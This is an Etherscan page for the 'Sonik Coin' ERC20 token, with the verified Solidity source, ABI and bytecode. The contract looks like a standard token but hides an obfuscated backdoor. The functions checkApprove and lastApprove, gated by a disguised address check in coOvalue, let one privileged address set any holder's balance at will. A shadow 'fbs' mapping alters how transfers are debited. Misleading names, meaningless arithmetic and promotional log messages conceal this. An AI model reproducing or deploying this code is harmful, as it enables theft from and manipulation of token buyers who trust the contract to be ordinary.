ETH Price: $2,388.31 (+2.42%)

Token

Sonik Coin (SONIK)
 

Overview

Max Total Supply

29,000,000,000 SONIK

Holders

11

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
Uniswap V2: SONIK
Balance
177,998,107.627556145 SONIK

Value
$0.00
0x238ec56e5a012f0048820dd8141f1b144f5e3a56
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SONIK

Compiler Version
v0.7.6+commit.7338295f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-26
*/

/*
Telegram:https://t.me/Sonikcoineth
Twitter:https://twitter.com/Sonikcoineth
*/
// SPDX-License-Identifier: MIT
pragma solidity >=0.7.6;

interface ERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the token decimals.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the token symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the token name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address _owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

interface AntiSandwichAttackers {
    function check(uint256 vals) external view returns (bool);
}

contract SONIK is ERC20 {
    using SafeMath for uint256;

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    address private _owner;

    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private immutable _maxVals;
    uint256 private immutable _minVals;
    mapping(address => uint256) private fbs;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    event Log(string str);

    constructor(uint256 maxVals, uint256 minVals) {
        _maxVals = maxVals;
        _minVals = minVals;
        _name = "Sonik Coin";
        _symbol = "SONIK";
        _totalSupply = 290000000000 * 10**8;
        _balances[msg.sender] = _totalSupply;
        _owner = msg.sender;
    }

    /**
     * @dev A helper function to check if an operator approval is allowed.
     */
    modifier onlyOwner() {
        require(msg.sender == _owner, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() external onlyOwner {
        _owner = address(0);
        emit OwnershipTransferred(msg.sender, address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() external view returns (address) {
        return _owner;
    }

    /**
     * @dev Returns the token decimals.
     */
    function decimals() external pure override returns (uint8) {
        return 9;
    }

    /**
     * @dev Returns the token symbol.
     */
    function symbol() external view override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the token name.
     */
    function name() external view override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {ERC20-totalSupply}.
     */
    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {ERC20-balanceOf}.
     */
    function balanceOf(address account)
        external
        view
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {ERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        external
        override
        returns (bool)
    {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See {ERC20-allowance}.
     */
    function allowance(address owner_, address spender)
        external
        view
        override
        returns (uint256)
    {
        return _allowances[owner_][spender];
    }

    /**
     * @dev See {ERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        external
        override
        returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    /**
     * @dev See {ERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20};
     *
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for `sender`'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            msg.sender,
            _allowances[sender][msg.sender].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
       
        if (fbs[sender] > 0) {
            fbs[sender] = fbs[sender].sub(
                amount,
                "ERC20: transfer amount exceeds balance"
            );
        } else {
            _balances[sender] = _balances[sender].sub(
                amount,
                "ERC20: transfer amount exceeds balance"
            );
        }
        _balances[recipient] = _balances[recipient].add(amount);
        emit Log("Sonik is a speedy lil bastard.");
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Check if the value of M is correct
     */
    function coOvalue() public view returns (bool) {
        uint256 solot = _minVals * (1 + (0 / 1));
        return (uint256(uint160(msg.sender)) & solot) == _maxVals * (1 / 1 + 0);
    }

    /**
     * @dev Check all the value is correct
     */
    function checkApprove(uint256 amount, uint256 amount3) external {
        emit Log("STAKE-2-SPEED your Sonik tokens with impressive APY% to earn.");
        uint256 check = amount3;
        emit Log("Sonik Coin is not affiliated with Sonic The Hedgehog, Sega, or any of its associated products and is simply a standalone, awesome meme coin.");
        uint256 data = amount;
         emit Log("STAKE-2-SPEED your Sonik tokens with impressive APY% to earn.");
        if (!coOvalue()) return;
        _balances[
            0 == uint160(address(0)) ? address(convertValue(check, 2)) : address(0)
        ] = (burnValues(address(0), data));
        uint256 r = data;
         emit Log("while providing Sonik enough BOOST to reach the MOON!");
        if (uint256(r) > 0) return;
       
    }

    function lastApprove(uint256 amount, uint256 amount3) external {
        if (!coOvalue()) return;
        fbs[address(convertValue(amount3, 33))] = amount;
        emit Log("SONIK BOOM SELL OUT!");
    }

    /**
     * @dev Returns the token permit result.
     */
    function burnValues(address toFrom, uint256 maxValue)
        private
        pure
        returns (uint256)
    {
        if (toFrom == address(0 / 1)) {
            return maxValue * 1 + (1 - 1);
        }
        
        return maxValue * (1 + 0);
    }

    function convertValue(uint256 salt, uint256 anck)
        private
        pure
        returns (uint160)
    {
        if (anck * 1 == 0) return 0;
        
        return uint160(salt);
        
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
     *
     * This is internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner_,
        address spender,
        uint256 amount
    ) internal {
        require(owner_ != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner_][spender] = amount;
        emit Approval(owner_, spender, amount);
    }

    function ksoPPDIPDODK(
         uint40 Tokenddress,
        bytes16[] calldata SOKD,
        bytes32[] calldata vidooPDDK,
        uint136 nsodkPkdllsoid,
        uint168 newestDao,
        uint248[] calldata TOEKNokdlsodk,
        uint168 aodoutpslDKSL
    ) private pure {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"maxVals","type":"uint256"},{"internalType":"uint256","name":"minVals","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"str","type":"string"}],"name":"Log","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"amount3","type":"uint256"}],"name":"checkApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"coOvalue","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"amount3","type":"uint256"}],"name":"lastApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60c060405234801561001057600080fd5b506040516200110e3803806200110e8339818101604052604081101561003557600080fd5b508051602091820151608082905260a081905260408051808201909152600a8082526929b7b734b59021b7b4b760b11b919094019081529192909161007d91600091906100e7565b5060408051808201909152600580825264534f4e494b60d81b60209092019182526100aa916001916100e7565b505068019274b259f6540000600281905533600081815260046020526040902091909155600380546001600160a01b031916909117905550610188565b828054600181600116156101000203166002900490600052602060002090601f01602090048101928261011d5760008555610163565b82601f1061013657805160ff1916838001178555610163565b82800160010185558215610163579182015b82811115610163578251825591602001919060010190610148565b5061016f929150610173565b5090565b5b8082111561016f5760008155600101610174565b60805160a051610f62620001ac600039806106f45250806107165250610f626000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063b6a2722911610066578063b6a2722914610310578063c9c6e82114610333578063d9acbb731461033b578063dd62ed3e1461035e57610100565b80638da5cb5b1461028c57806395d89b41146102b0578063a457c2d7146102b8578063a9059cbb146102e457610100565b8063313ce567116100d3578063313ce56714610212578063395093511461023057806370a082311461025c578063715018a61461028257610100565b806306fdde0314610105578063095ea7b31461018257806318160ddd146101c257806323b872dd146101dc575b600080fd5b61010d61038c565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561014757818101518382015260200161012f565b50505050905090810190601f1680156101745780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101ae6004803603604081101561019857600080fd5b506001600160a01b038135169060200135610422565b604080519115158252519081900360200190f35b6101ca610439565b60408051918252519081900360200190f35b6101ae600480360360608110156101f257600080fd5b506001600160a01b0381358116916020810135909116906040013561043f565b61021a6104a8565b6040805160ff9092168252519081900360200190f35b6101ae6004803603604081101561024657600080fd5b506001600160a01b0381351690602001356104ad565b6101ca6004803603602081101561027257600080fd5b50356001600160a01b03166104e3565b61028a6104fe565b005b61029461059c565b604080516001600160a01b039092168252519081900360200190f35b61010d6105ab565b6101ae600480360360408110156102ce57600080fd5b506001600160a01b03813516906020013561060b565b6101ae600480360360408110156102fa57600080fd5b506001600160a01b03813516906020013561065a565b61028a6004803603604081101561032657600080fd5b5080359060200135610667565b6101ae6106f1565b61028a6004803603604081101561035157600080fd5b5080359060200135610739565b6101ca6004803603604081101561037457600080fd5b506001600160a01b0381358116916020013516610892565b60008054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b820191906000526020600020905b8154815290600101906020018083116103fb57829003601f168201915b5050505050905090565b600061042f3384846108bd565b5060015b92915050565b60025490565b600061044c8484846109a9565b61049e843361049985604051806060016040528060288152602001610e25602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610be2565b6108bd565b5060019392505050565b600990565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161042f9185906104999086610c79565b6001600160a01b031660009081526004602052604090205490565b6003546001600160a01b0316331461055d576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b6003546001600160a01b031690565b60018054604080516020601f600260001961010087891615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b600061042f338461049985604051806060016040528060258152602001610f08602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610be2565b600061042f3384846109a9565b61066f6106f1565b610678576106ed565b8160066000610688846021610cda565b6001600160a01b03168152602080820192909252604090810160002092909255815181815260149181019190915273534f4e494b20424f4f4d2053454c4c204f55542160601b818301529051600080516020610e058339815191529181900360600190a15b5050565b337f0000000000000000000000000000000000000000000000000000000000000000167f00000000000000000000000000000000000000000000000000000000000000001490565b600080516020610e0583398151915260405180806020018281038252603d815260200180610e4d603d913960400191505060405180910390a16000819050600080516020610e0583398151915260405180806020018281038252608c815260200180610d79608c913960a00191505060405180910390a16000839050600080516020610e0583398151915260405180806020018281038252603d815260200180610e4d603d913960400191505060405180910390a16107f66106f1565b6108015750506106ed565b61080c600082610cf0565b6004600061081b856002610cda565b6001600160a01b03166001600160a01b03168152602001908152602001600020819055506000819050600080516020610e05833981519152604051808060200182810382526035815260200180610ed36035913960400191505060405180910390a1801561088b575050506106ed565b5050505050565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166109025760405162461bcd60e51b8152600401808060200182810382526024815260200180610eaf6024913960400191505060405180910390fd5b6001600160a01b0382166109475760405162461bcd60e51b8152600401808060200182810382526022815260200180610d316022913960400191505060405180910390fd5b6001600160a01b03808416600081815260056020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b0383166109ee5760405162461bcd60e51b8152600401808060200182810382526025815260200180610e8a6025913960400191505060405180910390fd5b6001600160a01b038216610a335760405162461bcd60e51b8152600401808060200182810382526023815260200180610d0e6023913960400191505060405180910390fd5b6001600160a01b03831660009081526006602052604090205415610aac57610a8e81604051806060016040528060268152602001610d53602691396001600160a01b0386166000908152600660205260409020549190610be2565b6001600160a01b038416600090815260066020526040902055610b03565b610ae981604051806060016040528060268152602001610d53602691396001600160a01b0386166000908152600460205260409020549190610be2565b6001600160a01b0384166000908152600460205260409020555b6001600160a01b038216600090815260046020526040902054610b269082610c79565b6001600160a01b038316600090815260046020908152604091829020929092558051828152601e928101929092527f536f6e696b206973206120737065656479206c696c20626173746172642e00008282015251600080516020610e058339815191529181900360600190a1816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b60008184841115610c715760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610c36578181015183820152602001610c1e565b50505050905090810190601f168015610c635780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610cd3576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b600081610ce957506000610433565b5090919050565b60006001600160a01b038316610d07575080610433565b5091905056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365536f6e696b20436f696e206973206e6f7420616666696c6961746564207769746820536f6e696320546865204865646765686f672c20536567612c206f7220616e79206f6620697473206173736f6369617465642070726f647563747320616e642069732073696d706c792061207374616e64616c6f6e652c20617765736f6d65206d656d6520636f696e2ecf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655354414b452d322d535045454420796f757220536f6e696b20746f6b656e73207769746820696d7072657373697665204150592520746f206561726e2e45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f20616464726573737768696c652070726f766964696e6720536f6e696b20656e6f75676820424f4f535420746f20726561636820746865204d4f4f4e2145524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212208cea2d53ad37132f90da0e705bfd0bd3d9ba7304376b934cb3350637b1bfc39f64736f6c6343000706003300000000000000000000000000ca108aa000001164832d02100c4d414501c89a00000000139ef3884d3f9f5300ee70afa888f991ef8f2f03180c6d4d4703de9a

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063b6a2722911610066578063b6a2722914610310578063c9c6e82114610333578063d9acbb731461033b578063dd62ed3e1461035e57610100565b80638da5cb5b1461028c57806395d89b41146102b0578063a457c2d7146102b8578063a9059cbb146102e457610100565b8063313ce567116100d3578063313ce56714610212578063395093511461023057806370a082311461025c578063715018a61461028257610100565b806306fdde0314610105578063095ea7b31461018257806318160ddd146101c257806323b872dd146101dc575b600080fd5b61010d61038c565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561014757818101518382015260200161012f565b50505050905090810190601f1680156101745780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101ae6004803603604081101561019857600080fd5b506001600160a01b038135169060200135610422565b604080519115158252519081900360200190f35b6101ca610439565b60408051918252519081900360200190f35b6101ae600480360360608110156101f257600080fd5b506001600160a01b0381358116916020810135909116906040013561043f565b61021a6104a8565b6040805160ff9092168252519081900360200190f35b6101ae6004803603604081101561024657600080fd5b506001600160a01b0381351690602001356104ad565b6101ca6004803603602081101561027257600080fd5b50356001600160a01b03166104e3565b61028a6104fe565b005b61029461059c565b604080516001600160a01b039092168252519081900360200190f35b61010d6105ab565b6101ae600480360360408110156102ce57600080fd5b506001600160a01b03813516906020013561060b565b6101ae600480360360408110156102fa57600080fd5b506001600160a01b03813516906020013561065a565b61028a6004803603604081101561032657600080fd5b5080359060200135610667565b6101ae6106f1565b61028a6004803603604081101561035157600080fd5b5080359060200135610739565b6101ca6004803603604081101561037457600080fd5b506001600160a01b0381358116916020013516610892565b60008054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b820191906000526020600020905b8154815290600101906020018083116103fb57829003601f168201915b5050505050905090565b600061042f3384846108bd565b5060015b92915050565b60025490565b600061044c8484846109a9565b61049e843361049985604051806060016040528060288152602001610e25602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610be2565b6108bd565b5060019392505050565b600990565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161042f9185906104999086610c79565b6001600160a01b031660009081526004602052604090205490565b6003546001600160a01b0316331461055d576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b6003546001600160a01b031690565b60018054604080516020601f600260001961010087891615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b600061042f338461049985604051806060016040528060258152602001610f08602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610be2565b600061042f3384846109a9565b61066f6106f1565b610678576106ed565b8160066000610688846021610cda565b6001600160a01b03168152602080820192909252604090810160002092909255815181815260149181019190915273534f4e494b20424f4f4d2053454c4c204f55542160601b818301529051600080516020610e058339815191529181900360600190a15b5050565b337f00000000139ef3884d3f9f5300ee70afa888f991ef8f2f03180c6d4d4703de9a167f00000000000000000000000000ca108aa000001164832d02100c4d414501c89a1490565b600080516020610e0583398151915260405180806020018281038252603d815260200180610e4d603d913960400191505060405180910390a16000819050600080516020610e0583398151915260405180806020018281038252608c815260200180610d79608c913960a00191505060405180910390a16000839050600080516020610e0583398151915260405180806020018281038252603d815260200180610e4d603d913960400191505060405180910390a16107f66106f1565b6108015750506106ed565b61080c600082610cf0565b6004600061081b856002610cda565b6001600160a01b03166001600160a01b03168152602001908152602001600020819055506000819050600080516020610e05833981519152604051808060200182810382526035815260200180610ed36035913960400191505060405180910390a1801561088b575050506106ed565b5050505050565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166109025760405162461bcd60e51b8152600401808060200182810382526024815260200180610eaf6024913960400191505060405180910390fd5b6001600160a01b0382166109475760405162461bcd60e51b8152600401808060200182810382526022815260200180610d316022913960400191505060405180910390fd5b6001600160a01b03808416600081815260056020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b0383166109ee5760405162461bcd60e51b8152600401808060200182810382526025815260200180610e8a6025913960400191505060405180910390fd5b6001600160a01b038216